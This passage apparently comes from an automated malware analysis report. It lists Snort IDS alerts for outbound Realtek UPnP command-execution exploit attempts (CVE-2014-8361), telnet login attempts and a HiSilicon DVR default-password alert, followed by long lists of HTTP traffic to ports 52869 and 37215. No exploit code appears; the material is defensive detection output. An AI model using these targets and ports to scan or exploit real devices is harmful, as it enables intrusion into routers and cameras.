Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34728 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34730 -> 185.65.160.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60418 -> 45.116.212.241:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:48138
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36118
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32918
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48884 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48888 -> 91.214.119.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44294 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44296 -> 45.45.156.148:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58534 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58534 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58544 -> 45.77.191.125:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36144
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35982
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32974
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:32944
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38632 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58818 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38636 -> 185.71.67.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58830 -> 91.78.174.248:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41760 -> 45.33.250.8:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36176
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58120 -> 178.72.106.93:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44938 -> 91.121.37.138:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43230 -> 91.76.197.73:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43234 -> 91.76.197.73:52869

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 42190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59502
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44220 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42792 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46480 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46486 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37900 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36894 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42006 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33852 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60430 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60440 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60422
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60432
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38806 -> 52869
